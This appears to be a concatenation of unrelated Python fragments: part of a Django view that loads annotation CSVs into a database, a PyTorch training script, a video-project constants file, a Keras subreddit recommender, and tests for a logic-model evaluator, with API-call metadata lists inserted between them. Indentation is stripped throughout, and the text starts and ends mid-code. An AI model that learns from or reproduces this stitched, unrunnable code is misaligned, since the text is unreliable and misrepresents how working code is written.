# rob_first_gt = robot_gt.first()
# ins_time = rob_first_gt.insertion_time
if overwrite == False:
if mode.ns_id == 'Robot':
if not user_to_gt.exists():
# user_to_gt_first = user_to_gt.first()
# if user_to_gt_first.insertion_time == ins_time:
# GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
# id_report=report,
# language=report.language,
# gt_type='concepts').delete()
Contains.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
else:
GroundTruthLogFile.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language,
gt_type='concepts').delete()
Contains.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
elif set(cols) == set(linking):
user_to_gt = GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report, language=report.language,
gt_type='concept-mention')
if overwrite == False:
if mode.ns_id == 'Robot':
if not user_to_gt.exists():
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='concepts').delete()
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='mentions').delete()
links = Linked.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language)
for e in links:
concept = e.concept_url
area = e.name
Contains.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language, name=area,
concept_url=concept).delete()
links.delete()
Annotate.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
else:
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='concepts').delete()
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='concept-mention').delete()
GroundTruthLogFile.objects.filter(username=user, ns_id=mode,
id_report=report,
language=report.language,
gt_type='mentions').delete()
links = Linked.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language)
for ll in links:
concept = ll.concept_url
area = ll.name
Contains.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language, concept_url=concept,name = area).delete()
Annotate.objects.filter(username=user, ns_id=mode, id_report=report,
language=report.language).delete()
links.delete()
for i in range(count_rows):
usecase = str(df.loc[i, 'usecase'])
usecase_obj = UseCase.objects.get(name=usecase)
mode = str(g.loc[i, 'annotation_mode'])
id_report = str(g.loc[i, 'id_report'])
language = str(g.loc[i, 'language'])
institute = str(g.loc[i, 'institute'])
# user_from = str(g.loc[i, 'username'])
if mode == 'Manual':
mode = 'Human'
elif mode == 'Automatic':
mode = 'Robot'
# username_from = User.objects.get(username=user_from, ns_id=mode)
mode = NameSpace.objects.get(ns_id = mode)
report = Report.objects.get(id_report=id_report, language=language, institute=institute)
if set(cols) == set(labels):
label = AnnotationLabel.objects.get(label = str(g.loc[i, 'label']),name = usecase_obj)
if (overwrite == False and not GroundTruthLogFile.objects.filter(username=user,
ns_id=mode,
id_report=report,
language=report.language,
gt_type='labels').exists()) or overwrite == True:
if not Associate.objects.filter(username=user, ns_id=mode, id_report=report, label=label,seq_number=label.seq_number,
language=report.language).exists():
Associate.objects.create(username=user, ns_id=mode, id_report=report, label=label,
seq_number=label.seq_number,
language=report.language, insertion_time=Now())
action = 'labels'
elif set(cols) == set(mentions):
mention = Mention.objects.get(id_report = report, language = language, start = int(g.loc[i, 'start']),
stop = int(g.loc[i, 'stop']))
if (overwrite == False and not GroundTruthLogFile.objects.filter(username=user,
ns_id=mode,
id_report=report,
language=report.language,
gt_type='mentions').exists()) or overwrite == True:
if not Annotate.objects.filter(username=user, ns_id=mode, id_report=report,start = mention,stop = mention.stop,
language=report.language).exists():
Annotate.objects.create(username=user, ns_id=mode, id_report=report,start = mention,stop = mention.stop,
language=report.language, insertion_time=Now())
action = 'mentions'
elif set(cols) == set(concepts):
concept = Concept.objects.get(concept_url = str(g.loc[i, 'concept_url']))
area = SemanticArea.objects.get(name=str(g.loc[i, 'area']))
if (overwrite == False and not GroundTruthLogFile.objects.filter(username=user,
ns_id=mode,
id_report=report,
language=report.language,
gt_type='concepts').exists()) or overwrite == True:
if not Contains.objects.filter(username = user, ns_id =mode, id_report = report,concept_url = concept,name = area,
language = report.language).exists():
Contains.objects.create(username = user, ns_id =mode, id_report = report,concept_url = concept,name = area,
language = report.language,insertion_time = Now())
action = 'concepts'
elif set(cols) == set(linking):
concept = Concept.objects.get(concept_url = str(g.loc[i, 'concept_url']))
area = SemanticArea.objects.get(name=str(g.loc[i, 'area']))
mention = Mention.objects.get(id_report=report, language=language,start=int(g.loc[i, 'start']),
stop=int(g.loc[i, 'stop']))
if (overwrite == False and not GroundTruthLogFile.objects.filter(username=user,
ns_id=mode,
id_report=report,
language=report.language,
gt_type='concept-mention').exists()) or overwrite == True:
if not deleted_mentions:
Annotate.objects.filter(username=user, ns_id=mode, id_report=report,language=report.language).delete()
deleted_mentions = True
a = Annotate.objects.filter(username = user, ns_id = mode, id_report = report,
language = report.language,start=mention,stop = mention.stop)
c = Contains.objects.filter(username = user, ns_id = mode, id_report = report,concept_url = concept,name = area,
language = report.language)
l = Linked.objects.filter(username = user, ns_id = mode, id_report = report,concept_url = concept,name = area,
language = report.language,start=mention,stop = mention.stop)
if not a.exists():
Annotate.objects.create(username=user, ns_id=mode, id_report=report,
language=report.language, start=mention, stop=mention.stop, insertion_time = Now())
if not c.exists():
Contains.objects.create(username = user, ns_id = mode, id_report = report,concept_url = concept,name = area,
language = report.language,insertion_time = Now())
if not l.exists():
Linked.objects.create(username = user, ns_id = mode, id_report = report,concept_url = concept,name = area,
language = report.language,start=mention,stop = mention.stop,insertion_time = Now())
action = 'concept-mention'
if action != '':
# gt_json = serialize_gt(action, usecase, user_to, report_cur.id_report, report_cur.language,
# anno_mode)
# GroundTruthLogFile.objects.create(username=user, ns_id=anno_mode, gt_type=action,gt_json=gt_json, insertion_time=Now(),id_report=report_cur, language=language)
if action == 'concept-mention':
gt_json = serialize_gt('mentions', usecase, user_to, report_cur.id_report, report_cur.language,
anno_mode)
GroundTruthLogFile.objects.create(username=user, ns_id=anno_mode, gt_type='mentions',
gt_json=gt_json, insertion_time=Now(),
id_report=report_cur, language=language)
gt_json = serialize_gt('concepts', usecase, user_to, report_cur.id_report, report_cur.language,
anno_mode)
GroundTruthLogFile.objects.create(username=user, ns_id=anno_mode, gt_type='concepts',
gt_json=gt_json, insertion_time=Now(),
id_report=report_cur, language=language)
if action == 'mentions':
gt_json = serialize_gt('concepts', usecase, user_to, report_cur.id_report, report_cur.language,
anno_mode)
if Contains.objects.filter(id_report=report_cur, language=language,username=user, ns_id=anno_mode).count()>0 and Linked.objects.filter(id_report=report_cur, language=language,username=user, ns_id=anno_mode).count()>0:
GroundTruthLogFile.objects.create(username=user, ns_id=anno_mode, gt_type='concepts',
gt_json=gt_json, insertion_time=Now(),
id_report=report_cur, language=language)
except Exception as e:
print(e)
json_resp = {'message':'an error occurred, remember that your configuration must be the same of the one of the user you are uploading the annotations of.'}
finally:
return json_resp
| [
"pandas.read_csv",
"psycopg2.extensions.AsIs",
"django.db.transaction.atomic",
"pandas.notnull",
"psycopg2.extensions.register_adapter"
] | [((316, 369), 'psycopg2.extensions.register_adapter', 'register_adapter', (['numpy.float64', 'addapt_numpy_float64'], {}), '(numpy.float64, addapt_numpy_float64)\n', (332, 369), False, 'from psycopg2.extensions import register_adapter, AsIs\n'), ((370, 419), 'psycopg2.extensions.register_adapter', 'register_adapter', (['numpy.int64', 'addapt_numpy_int64'], {}), '(numpy.int64, addapt_numpy_int64)\n', (386, 419), False, 'from psycopg2.extensions import register_adapter, AsIs\n'), ((230, 249), 'psycopg2.extensions.AsIs', 'AsIs', (['numpy_float64'], {}), '(numpy_float64)\n', (234, 249), False, 'from psycopg2.extensions import register_adapter, AsIs\n'), ((298, 315), 'psycopg2.extensions.AsIs', 'AsIs', (['numpy_int64'], {}), '(numpy_int64)\n', (302, 315), False, 'from psycopg2.extensions import register_adapter, AsIs\n'), ((1013, 1034), 'pandas.read_csv', 'pd.read_csv', (['files[i]'], {}), '(files[i])\n', (1024, 1034), True, 'import pandas as pd\n'), ((3583, 3603), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (3601, 3603), False, 'from django.db import transaction\n'), ((1061, 1075), 'pandas.notnull', 'pd.notnull', (['df'], {}), '(df)\n', (1071, 1075), True, 'import pandas as pd\n'), ((3666, 3687), 'pandas.read_csv', 'pd.read_csv', (['files[i]'], {}), '(files[i])\n', (3677, 3687), True, 'import pandas as pd\n'), ((3718, 3732), 'pandas.notnull', 'pd.notnull', (['df'], {}), '(df)\n', (3728, 3732), True, 'import pandas as pd\n')] |
import sys
sys.path.append("/home/ly/workspace/mmsa")
seed = 1938
import numpy as np
import torch
from torch import nn
from torch import optim
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
from models.bigru_rcnn_gate import *
from utils.train import *
from typing import *
from utils.load_raw_yelp import *
from utils.dataset import *
from utils.train import *
from utils.train import *
def main():
train_set, valid_set, test_set = load_glove_data(config)
batch_size = 2
workers = 2
train_loader, valid_loader, test_loader = get_loader(batch_size, workers, get_collate_fn(config),
train_set, valid_set, test_set)
model = Model(config)
#X, y = iter(valid_loader).next()
#res = model(X)
loss = nn.CrossEntropyLoss()
# get_parameter_number(model), loss
viz = get_Visdom()
lr = 1e-3
epoches = 20
optimizer = get_regal_optimizer(model, optim.AdamW, lr)
k_batch_train_visdom(model, optimizer, loss, valid_loader, viz, 30, 10, use_cuda=False)
if __name__ == "__main__":
# torch.cuda.set_device(1)
main() | [
"torch.cuda.manual_seed_all",
"torch.manual_seed",
"torch.nn.CrossEntropyLoss",
"numpy.random.seed",
"torch.cuda.manual_seed",
"sys.path.append"
] | [((11, 53), 'sys.path.append', 'sys.path.append', (['"""/home/ly/workspace/mmsa"""'], {}), "('/home/ly/workspace/mmsa')\n", (26, 53), False, 'import sys\n'), ((144, 164), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (158, 164), True, 'import numpy as np\n'), ((165, 188), 'torch.manual_seed', 'torch.manual_seed', (['seed'], {}), '(seed)\n', (182, 188), False, 'import torch\n'), ((189, 217), 'torch.cuda.manual_seed', 'torch.cuda.manual_seed', (['seed'], {}), '(seed)\n', (211, 217), False, 'import torch\n'), ((218, 250), 'torch.cuda.manual_seed_all', 'torch.cuda.manual_seed_all', (['seed'], {}), '(seed)\n', (244, 250), False, 'import torch\n'), ((820, 841), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (839, 841), False, 'from torch import nn\n')] |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
########################################################################
# GNU General Public License v3.0
# GNU GPLv3
# Copyright (c) 2019, <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
########################################################################
"""
Constants for project.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import platform
import numpy as np
DL_FRAMEWORKS = np.array(['caffe', 'tensorflow', 'pytorch', 'keras', 'caffe2'])
DL_FRAMEWORK = None
GPU_CORE_ID = 0
CNN_FEATURE_SIZES = np.array([2048, 2048, 1000, 1024, 1000, 2048, 2048])
CNN_FEATURE_TYPES = np.array(['fc6', 'fc7', 'fc1000', 'fc1024', 'fc365', 'prob', 'pool5', 'fc8a', 'res3b7', 'res4b35', 'res5c'])
CNN_MODEL_TYPES = np.array(['resnet152', 'googlenet1k', 'vgg16', 'places365-resnet152', 'places365-vgg', 'googlenet13k'])
RESIZE_TYPES = np.array(['resize', 'resize_crop', 'resize_crop_scaled', 'resize_keep_aspect_ratio_padded'])
ROOT_PATH_TYPES = np.array(['data', 'project'])
TRAIN_SCHEMES = np.array(['ete', 'tco'])
MODEL_CLASSIFICATION_TYPES = np.array(['ml', 'sl'])
MODEL_MULTISCALE_TYPES = np.array(['dl', 'ks'])
SOLVER_NAMES = np.array(['adam', 'sgd'])
DATASET_NAMES = np.array(['charades', 'kinetics400', 'breakfast_actions', 'you_cook_2', 'multi_thumos'])
DATA_ROOT_PATH = './data'
PROJECT_ROOT_PATH = '../'
MACHINE_NAME = platform.node()
| [
"numpy.array",
"platform.node"
] | [((1150, 1213), 'numpy.array', 'np.array', (["['caffe', 'tensorflow', 'pytorch', 'keras', 'caffe2']"], {}), "(['caffe', 'tensorflow', 'pytorch', 'keras', 'caffe2'])\n", (1158, 1213), True, 'import numpy as np\n'), ((1271, 1323), 'numpy.array', 'np.array', (['[2048, 2048, 1000, 1024, 1000, 2048, 2048]'], {}), '([2048, 2048, 1000, 1024, 1000, 2048, 2048])\n', (1279, 1323), True, 'import numpy as np\n'), ((1344, 1456), 'numpy.array', 'np.array', (["['fc6', 'fc7', 'fc1000', 'fc1024', 'fc365', 'prob', 'pool5', 'fc8a',\n 'res3b7', 'res4b35', 'res5c']"], {}), "(['fc6', 'fc7', 'fc1000', 'fc1024', 'fc365', 'prob', 'pool5',\n 'fc8a', 'res3b7', 'res4b35', 'res5c'])\n", (1352, 1456), True, 'import numpy as np\n'), ((1471, 1578), 'numpy.array', 'np.array', (["['resnet152', 'googlenet1k', 'vgg16', 'places365-resnet152',\n 'places365-vgg', 'googlenet13k']"], {}), "(['resnet152', 'googlenet1k', 'vgg16', 'places365-resnet152',\n 'places365-vgg', 'googlenet13k'])\n", (1479, 1578), True, 'import numpy as np\n'), ((1590, 1686), 'numpy.array', 'np.array', (["['resize', 'resize_crop', 'resize_crop_scaled',\n 'resize_keep_aspect_ratio_padded']"], {}), "(['resize', 'resize_crop', 'resize_crop_scaled',\n 'resize_keep_aspect_ratio_padded'])\n", (1598, 1686), True, 'import numpy as np\n'), ((1701, 1730), 'numpy.array', 'np.array', (["['data', 'project']"], {}), "(['data', 'project'])\n", (1709, 1730), True, 'import numpy as np\n'), ((1747, 1771), 'numpy.array', 'np.array', (["['ete', 'tco']"], {}), "(['ete', 'tco'])\n", (1755, 1771), True, 'import numpy as np\n'), ((1801, 1823), 'numpy.array', 'np.array', (["['ml', 'sl']"], {}), "(['ml', 'sl'])\n", (1809, 1823), True, 'import numpy as np\n'), ((1849, 1871), 'numpy.array', 'np.array', (["['dl', 'ks']"], {}), "(['dl', 'ks'])\n", (1857, 1871), True, 'import numpy as np\n'), ((1887, 1912), 'numpy.array', 'np.array', (["['adam', 'sgd']"], {}), "(['adam', 'sgd'])\n", (1895, 1912), True, 'import numpy as np\n'), ((1929, 2021), 'numpy.array', 'np.array', (["['charades', 'kinetics400', 'breakfast_actions', 'you_cook_2', 'multi_thumos']"], {}), "(['charades', 'kinetics400', 'breakfast_actions', 'you_cook_2',\n 'multi_thumos'])\n", (1937, 2021), True, 'import numpy as np\n'), ((2085, 2100), 'platform.node', 'platform.node', ([], {}), '()\n', (2098, 2100), False, 'import platform\n')] |
import json
import numpy as np
import os
import tensorflow as tf
from keras.models import Sequential
from keras.layers import Dense, Dropout, Embedding, Flatten, Activation, BatchNormalization
from sklearn.model_selection import train_test_split
class SuggestionModeler(object):
"""
A collection of functions to generate a model of subreddit suggestions from the data retreived in
data_retrieval.py
"""
def __init__(self, force_retrain=False):
self.session = tf.Session()
self.graph = tf.get_default_graph()
with open("model_generation/config.json", "r") as infile:
self.config = json.loads(infile.read())
if os.path.exists("config_override.json"):
with open("model_generation/config_override.json", "r") as infile:
self.config.update(json.loads(infile.read()))
self.subreddit_to_rank = dict()
with open(self.config["rank_to_subreddit_path"], 'r') as infile:
self.rank_to_subreddit = json.loads(infile.read())
self.rank_to_subreddit = {int(k): v for k, v in self.rank_to_subreddit.items()}
for rank, subreddit in self.rank_to_subreddit.items():
self.subreddit_to_rank[subreddit] = rank
with open(self.config['rank_to_sfw_status'], 'r') as infile:
self.rank_to_sfw_status = json.loads(infile.read())
self.rank_to_sfw_status = {int(k): v for k, v in self.rank_to_sfw_status.items()}
self.method = self.config["method"]
self.model_path = self.config['model_path'].format(method=self.method)
if self.method == "hot":
model = Sequential()
model.add(Dense(512, activation='relu',
input_shape=(self.config['max_subreddits_in_model'], )))
model.add(Dropout(0.5))
model.add(Dense(self.config['max_subreddits_in_model'], activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['acc'])
else:
raise ValueError("'method' in config not well defined")
self.model = model
if force_retrain or not os.path.exists(self.model_path):
model.summary()
print("Preparing train/test data...")
X, y = self.arrange_training_data(method=self.method)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=self.config['test_pct'])
train_data, test_data = (X_train, y_train), (X_test, y_test)
print("Starting training process...")
self.train_model(train_data, test_data)
with self.graph.as_default():
with self.session.as_default():
self.model.load_weights(self.model_path)
def arrange_training_data(self, method):
import random
with open(self.config["combined_user_to_subreddit_score_path"], 'r') as infile:
user_subreddit_scores = json.loads(infile.read())
for k, scores in user_subreddit_scores.items():
user_subreddit_scores[k] = sorted(scores, key=lambda x: x[1], reverse=True)
data_length, data_width = len(user_subreddit_scores), self.config['max_subreddits_in_model']
user_subreddit_scores = list(user_subreddit_scores.values())
random.shuffle(user_subreddit_scores)
if method == 'hot': # Input vector is one-hot encoding.
X = np.zeros((data_length, data_width), dtype=np.bool)
for i, scores in enumerate(user_subreddit_scores):
for subreddit_key, score in scores:
if subreddit_key <= data_width:
X[i][subreddit_key - 1] = True
else:
raise ValueError(f"Unhandled training data preparation method {method}")
y = np.zeros((data_length, data_width), dtype=np.bool)
for i, scores in enumerate(user_subreddit_scores):
for subreddit_key, score in scores:
if subreddit_key <= data_width:
y[i][subreddit_key-1] = score > 0
return X, y
def arrange_user_data(self, user_data):
user_data = {k: v for k, v in sorted(user_data.items(), key=lambda x: x[1], reverse=True)
if 0 < self.subreddit_to_rank.get(k, -1) < self.config['max_subreddits_in_model']}
if self.method == 'hot':
data = np.zeros((1, self.config['max_subreddits_in_model']), dtype=np.bool)
for subreddit_name, subreddit_score in user_data.items():
if subreddit_name in self.subreddit_to_rank:
data[0][self.subreddit_to_rank[subreddit_name]-1] = subreddit_score > 0
return data
def train_model(self, train_data, test_data):
X, y = train_data
self.model.fit(X, y, epochs=5, batch_size=256, verbose=1)
self.model.save(self.model_path)
X, y = test_data
scores = self.model.evaluate(X, y, verbose=1)
print(self.model.metrics_names)
print(scores)
def get_user_predictions(self, user_data):
arranged_data = self.arrange_user_data(user_data)
user_known_subreddits = set(list(user_data.keys()))
with self.graph.as_default():
with self.session.as_default():
predictions = self.model.predict(arranged_data)[0]
predictions = [(self.rank_to_subreddit[i+1], round(float(score), 5), i) for i, score
in enumerate(predictions) if self.rank_to_subreddit[i+1] not in user_known_subreddits \
and self.rank_to_sfw_status[i+1] and i > 200]
predictions.sort(key=lambda x: x[1], reverse=True)
return predictions
if __name__ == '__main__':
import os
os.chdir('..')
modeler = SuggestionModeler(True)
| [
"os.path.exists",
"random.shuffle",
"sklearn.model_selection.train_test_split",
"tensorflow.Session",
"keras.models.Sequential",
"os.chdir",
"numpy.zeros",
"keras.layers.Dense",
"keras.layers.Dropout",
"tensorflow.get_default_graph"
] | [((5754, 5768), 'os.chdir', 'os.chdir', (['""".."""'], {}), "('..')\n", (5762, 5768), False, 'import os\n'), ((490, 502), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (500, 502), True, 'import tensorflow as tf\n'), ((524, 546), 'tensorflow.get_default_graph', 'tf.get_default_graph', ([], {}), '()\n', (544, 546), True, 'import tensorflow as tf\n'), ((677, 715), 'os.path.exists', 'os.path.exists', (['"""config_override.json"""'], {}), "('config_override.json')\n", (691, 715), False, 'import os\n'), ((3308, 3345), 'random.shuffle', 'random.shuffle', (['user_subreddit_scores'], {}), '(user_subreddit_scores)\n', (3322, 3345), False, 'import random\n'), ((3814, 3864), 'numpy.zeros', 'np.zeros', (['(data_length, data_width)'], {'dtype': 'np.bool'}), '((data_length, data_width), dtype=np.bool)\n', (3822, 3864), True, 'import numpy as np\n'), ((1656, 1668), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (1666, 1668), False, 'from keras.models import Sequential\n'), ((2391, 2448), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': "self.config['test_pct']"}), "(X, y, test_size=self.config['test_pct'])\n", (2407, 2448), False, 'from sklearn.model_selection import train_test_split\n'), ((3428, 3478), 'numpy.zeros', 'np.zeros', (['(data_length, data_width)'], {'dtype': 'np.bool'}), '((data_length, data_width), dtype=np.bool)\n', (3436, 3478), True, 'import numpy as np\n'), ((4393, 4461), 'numpy.zeros', 'np.zeros', (["(1, self.config['max_subreddits_in_model'])"], {'dtype': 'np.bool'}), "((1, self.config['max_subreddits_in_model']), dtype=np.bool)\n", (4401, 4461), True, 'import numpy as np\n'), ((1691, 1780), 'keras.layers.Dense', 'Dense', (['(512)'], {'activation': '"""relu"""', 'input_shape': "(self.config['max_subreddits_in_model'],)"}), "(512, activation='relu', input_shape=(self.config[\n 'max_subreddits_in_model'],))\n", (1696, 1780), False, 'from keras.layers import Dense, Dropout, Embedding, Flatten, Activation, BatchNormalization\n'), ((1828, 1840), 'keras.layers.Dropout', 'Dropout', (['(0.5)'], {}), '(0.5)\n', (1835, 1840), False, 'from keras.layers import Dense, Dropout, Embedding, Flatten, Activation, BatchNormalization\n'), ((1864, 1931), 'keras.layers.Dense', 'Dense', (["self.config['max_subreddits_in_model']"], {'activation': '"""sigmoid"""'}), "(self.config['max_subreddits_in_model'], activation='sigmoid')\n", (1869, 1931), False, 'from keras.layers import Dense, Dropout, Embedding, Flatten, Activation, BatchNormalization\n'), ((2167, 2198), 'os.path.exists', 'os.path.exists', (['self.model_path'], {}), '(self.model_path)\n', (2181, 2198), False, 'import os\n')] |
##################################################
#
# Tests for model.py
#
#
#
#
#
#
#
#
#
#
#
##################################################
from boole.core.model import *
from boole.core.language import clear_default_language
from nose.tools import *
def is_prime(x):
if x == 0 or x == 1:
return False
elif x == 2:
return True
else:
for i in range(2, x):
if x % i == 0:
return False
return True
def test_val_strict():
#It is annoying that types can not be redefined: turn into a warning?
clear_default_language()
x, y, z = Int('x y z')
p, q, r, s = Bool('p q r s')
People = EnumType('People', ['Alice', 'Bob', 'Carol'])
Alice, Bob, Carol = People.make_constants()
u1, u2, u3, u4, u5 = People('u1 u2 u3 u4 u5')
assert_equal(val_strict(ii(3)), 3)
assert_equal(val_strict(rr(4.5)), 4.5)
assert_equal(val_strict(-ii(3) + (4.5) * (2)), 6)
assert_equal(val_strict(Alice), 'Alice')
assert_equal(val_strict(Bob), 'Bob')
assert(val_strict(Forall(u1, (u1 == Alice) | (u1 == Bob) | (u1 == Carol))))
assert(not val_strict(Forall(u1, (u1 == Alice) | (u1 == Bob))))
assert(not val_strict(true != true))
assert(not val_strict(Exists([u1, u2, u3, u4], And(u1 != u2, u1 != u3, u1 != u4,
u2 != u3, u2 != u4, u3 != u4))))
assert(val_strict(true & (false >> true)))
assert(not val_strict(true & ~(false >> true)))
assert(val_strict(Abs([x, y], x + y)((5), (7))))
assert(val_strict(Exists(p, p)))
e = Exists([p, q, r], (p >> q & r) & ~(r >> p & q))
assert(val_strict(e))
assert(not val_strict(Forall([p,q], Exists(r, p >> r & q >> ~r))))
assert(val_strict(Forall([p,q], (((p >> q) >> p) >> p))))
a, b, c = Int('a, b, c')
Even = Const('Even', Int >> Bool)
Prime = Const('Prime', Int >> Bool)
suc, square = (Int >> Int)('suc, square')
a, b, c = Int('a, b, c')
Even = Const('Even', Int >> Bool)
Prime = Const('Prime', Int >> Bool)
suc, square = (Int >> Int)('suc, square')
M = Model({(a, 5), (b, 2), (c, 7)})
M[Int] = dom_range(0,20)
M[Even] = lambda x: x % 2 == 0
M[Prime] = is_prime
M[suc] = lambda x: x + 1
M[square] = lambda x: x * x
assert_equal(val_strict(a, M), 5)
assert_equal(val_strict(a + b * c, M), 19)
assert(val_strict(Exists(x, b + x == c), M))
assert(not val_strict(Even(a), M))
assert(val_strict(Prime((23)), M))
assert(not val_strict(Prime((22)), M))
assert(val_strict(And(Prime(a), Prime(b), Prime(c)), M))
assert(val_strict(Even(c) | And(Prime(a), Prime(b), Prime(c)), M))
assert(not val_strict(Even(c) | And(Prime(suc(a)), Prime(suc(b)), Prime(c)), M))
assert(val_strict(Exists(x, Even(x)), M))
assert(val_strict(Exists(x, And(Prime(x), Even(x))), M))
assert(not val_strict(Exists(x, And(Prime(x), Even(x), c < x)), M))
assert(val_strict(Exists([x, y], And(Prime(x), Prime(y), x < y)), M))
assert(val_strict(Exists([x, y], And(Prime(x), Prime(y), x != y)), M))
assert(not val_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(y))), M))
assert(val_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(x))), M))
assert(not val_strict(Forall(x, Even(x)), M))
assert(val_strict(Forall(x, Or(Even(x), ~Even(x))), M))
assert(val_strict(Forall(x, Even(x) >> ~Even(suc(x))), M))
assert(val_strict(Forall(x, Even(x) >> Even(square(x))), M))
assert(not val_strict(Exists(x, And(Even(x), ~Even(square(x)))), M))
assert(val_strict(Forall(x, Even(square(x)) >> Even(x)), M))
assert(not val_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> Even(x)), M))
assert(val_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> ~Even(y)), M))
assert(not val_strict(Forall(x, Exists(y, x < y)), M))
assert(not val_strict(Forall([x, y], x < y >> Exists(z, And(x < z, z < y))), M))
assert(val_strict(Forall([x, y], And(Even(x), Even(y), x < y) >>
Exists(z, (x < z) & (z < y))), M))
def precond(n):
return ((2) < n) & Even(n)
def goldbach(n):
return precond(n) >> Exists([x,y], Prime(x) & Prime(y) & (x + y == n))
Goldbach = Forall(z, goldbach(z))
assert(val_strict(Goldbach, M))
def test_val_non_strict():
clear_default_language()
x, y, z = Int('x y z')
p, q, r, s = Bool('p q r s')
People = EnumType('People', ['Alice', 'Bob', 'Carol'])
Alice, Bob, Carol = People.make_constants()
u1, u2, u3, u4, u5 = People('u1 u2 u3 u4 u5')
assert_equal(val_non_strict(ii(3)), 3)
assert_equal(val_non_strict(rr(4.5)), 4.5)
assert_equal(val_non_strict(-(3) + (4.5) * ii(2)), 6)
assert_equal(val_non_strict(Alice), 'Alice')
assert_equal(val_non_strict(Bob), 'Bob')
assert_equal(val_non_strict(x), None)
assert(val_non_strict(Forall(u1, (u1 == Alice) | (u1 == Bob) | (u1 == Carol))))
assert(not val_non_strict(Forall(u1, (u1 == Alice) | (u1 == Bob))))
assert(not val_non_strict(true != true))
assert(not val_non_strict(Exists([u1, u2, u3, u4], And(u1 != u2, u1 != u3, u1 != u4,
u2 != u3, u2 != u4, u3 != u4))))
assert(val_non_strict(true & (false >> true)))
assert(not val_non_strict(true & ~(false >> true)))
assert(val_non_strict(Abs([x, y], x + y)((5), (7))))
assert(val_non_strict(Exists(p, p)))
e = Exists([p, q, r], (p >> q & r) & ~(r >> p & q))
assert(val_non_strict(e))
assert(not val_non_strict(Forall([p,q], Exists(r, p >> r & q >> ~r))))
assert(val_non_strict(Forall([p,q], (((p >> q) >> p) >> p))))
assert(val_non_strict(true | p))
a, b, c = Int('a, b, c')
Even = Const('Even', Int >> Bool)
Prime = Const('Prime', Int >> Bool)
suc, square = (Int >> Int)('suc, square')
a, b, c = Int('a, b, c')
Even = Const('Even', Int >> Bool)
Prime = Const('Prime', Int >> Bool)
suc, square = (Int >> Int)('suc, square')
M = Model({(a, 5), (b, 2), (c, 7)})
M[Int] = dom_range(0,20)
M[Even] = lambda x: x % 2 == 0
M[Prime] = is_prime
M[suc] = lambda x: x + 1
M[square] = lambda x: x * x
assert_equal(val_non_strict(a, M), 5)
assert_equal(val_non_strict(a + b * c, M), 19)
assert(val_non_strict(Exists(x, b + x == c), M))
assert(not val_non_strict(Even(a), M))
assert(val_non_strict(Prime((23)), M))
assert(not val_non_strict(Prime((22)), M))
assert(val_non_strict(And(Prime(a), Prime(b), Prime(c)), M))
assert(val_non_strict(Even(c) | And(Prime(a), Prime(b), Prime(c)), M))
assert(not val_non_strict(Even(c) | And(Prime(suc(a)), Prime(suc(b)), Prime(c)), M))
assert(val_non_strict(Exists(x, Even(x)), M))
assert(val_non_strict(Exists(x, And(Prime(x), Even(x))), M))
assert(not val_non_strict(Exists(x, And(Prime(x), Even(x), c < x)), M))
assert(val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x < y)), M))
assert(val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x != y)), M))
assert(not val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(y))), M))
assert(val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(x))), M))
assert(not val_non_strict(Forall(x, Even(x)), M))
assert(val_non_strict(Forall(x, Or(Even(x), ~Even(x))), M))
assert(val_non_strict(Forall(x, Even(x) >> ~Even(suc(x))), M))
assert(val_non_strict(Forall(x, Even(x) >> Even(square(x))), M))
assert(not val_non_strict(Exists(x, And(Even(x), ~Even(square(x)))), M))
assert(val_non_strict(Forall(x, Even(square(x)) >> Even(x)), M))
assert(not val_non_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> Even(x)), M))
assert(val_non_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> ~Even(y)), M))
assert(not val_non_strict(Forall(x, Exists(y, x < y)), M))
assert(not val_non_strict(Forall([x, y], x < y >> Exists(z, And(x < z, z < y))), M))
assert(val_non_strict(Forall([x, y], And(Even(x), Even(y), x < y) >>
